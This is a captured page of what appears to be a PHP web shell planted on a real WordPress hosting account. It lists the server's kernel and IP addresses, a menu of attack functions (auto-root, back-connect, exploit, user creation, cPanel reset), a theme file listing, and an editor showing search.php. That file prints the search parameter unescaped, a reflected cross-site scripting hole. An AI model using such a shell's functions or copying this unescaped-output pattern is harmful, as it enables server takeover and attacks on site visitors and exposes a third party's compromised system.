Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
vmd /
wp-content /
themes /
theme_vmd /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwx---r-x
inc
[ DIR ]
drwx---r-x
footer.php
3.33
KB
-rw----r--
functions.php
5.36
KB
-rw----r--
header.php
10.82
KB
-rw----r--
home.php
34.41
KB
-rw----r--
index.php
0
B
-rw----r--
more-functions.php
18.89
KB
-rw-r--r--
oil_gaz.php
7.49
KB
-rw----r--
screenshot.png
5.8
MB
-rw----r--
search.php
1.3
KB
-rw----r--
solution.php
6.18
KB
-rw----r--
style.css
130
B
-rw----r--
wordfence.php
27.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.php
<?php /* Template name: search */ get_header(); ?> <?php if($_GET['search_text'] && !empty($_GET['search_text'])) { $text = $_GET['search_text']; } ?> <section class="header_ py-5"> <div class="container"> <div class="all-title"> <div class="title_header"> <h1>Résultat de recherche : <?= $text ?></h1> </div> </div> </div> </section> <section class="products_boutique my-5"> <div class="container"> <div class="row mt-4"> <?php $args= array( 'post_type' => array('product'), 'posts_per_page' => -1, 's' => $text, ); $query_search = new WP_Query($args); while($query_search -> have_posts()) : $query_search -> the_post(); ?> <div class="col-lg-6 col-md-6 col-12"> <div class="card-product mt-3"> <img width="62%" class="img-fluid" src="<?= get_the_post_thumbnail_url() ?>"> <h5><?php the_title() ?></h5> <p><?= the_excerpt() ?></p> <a class="btn btn-product " href="<?php the_permalink() ?>">VOIR PLUS</a> </div> </div> <?php endwhile; wp_reset_postdata();?> </div> </div> </section> <?php get_footer() ?>
Close